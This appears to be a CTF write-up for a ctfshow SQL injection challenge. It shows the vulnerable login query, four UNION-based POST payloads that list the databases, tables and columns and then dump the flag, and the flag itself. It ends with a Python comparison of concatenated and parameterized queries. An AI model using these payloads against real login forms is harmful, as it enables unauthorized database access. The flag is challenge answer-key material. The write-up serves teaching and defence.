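This time it has become a POST injection, still with two parameters.
First, capture a request and take a look:
The injection point should be admin.
Take a look at the source code for this challenge in the local environment.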
SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1
The value is closed with a single quote ('). The number of columns is 2.
Enumerate the databases: ctfshow
uname=xxx' and 1=2 union select 1,group_concat(schema_name) from information_schema.schemata--+&passwd=123456&submit=Submit
Enumerate the tables: flagugsd
uname=xxx' and 1=2 union select 1,group_concat(table_name)from information_schema.tables where table_schema='ctfshow'--+&passwd=123456&submit=Submit
Enumerate the columns: flag43s
uname=xxx' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='flagugsd'--+&passwd=123456&submit=Submit
Retrieve the field value (flag):
ctfshow{d7bf0480-8156-479b-9f97-4fbeb89233db}
uname=xxx' and 1=2 union select 1,group_concat(flag43s) from ctfshow.flagugsd--+&passwd=123456&submit=Submit
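The root cause is the login query shown above, which pastes $uname and $passwd directly inside the single quotes. The following added example (not part of the original writeup or the challenge source) runs that query shape next to a parameterized version. Assumptions: SQLite stands in for the challenge's MySQL, and the table contents, function names and probe string are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data; SQLite stands in for the challenge's MySQL.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-pw')")
    return db

def login_concat(db, uname, passwd):
    # Same shape as the query shown above: input is pasted inside the quotes,
    # so a quote in uname ends the string and the rest is parsed as SQL.
    sql = ("SELECT username, password FROM users "
           f"WHERE username='{uname}' and password='{passwd}' LIMIT 0,1")
    return db.execute(sql).fetchone()

def login_bound(db, uname, passwd):
    # Hardened form: placeholders keep the input as data, never as SQL text.
    sql = ("SELECT username, password FROM users "
           "WHERE username=? and password=? LIMIT 0,1")
    return db.execute(sql, (uname, passwd)).fetchone()

# Constructed probe in the style of the page's payloads.
# In a form-encoded body "--+" decodes to "-- ", which starts a SQL comment.
PROBE = "xxx' and 1=2 union select 1,2-- "

def compare():
    db = make_db()
    return {
        # Concatenated query: the UNION row is returned, confirming 2 columns.
        "concat_probe": login_concat(db, PROBE, "123456"),
        # Bound query: the probe is just a username that does not exist.
        "bound_probe": login_bound(db, PROBE, "123456"),
        # Bound query still works for a legitimate login.
        "bound_valid": login_bound(db, "admin", "constructed-pw"),
    }

if __name__ == "__main__":
    for name, row in compare().items():
        print(name, row)
```

In the PHP original, the equivalent fix is a prepared statement with bound parameters (mysqli or PDO) instead of interpolating the POST values into the SQL string.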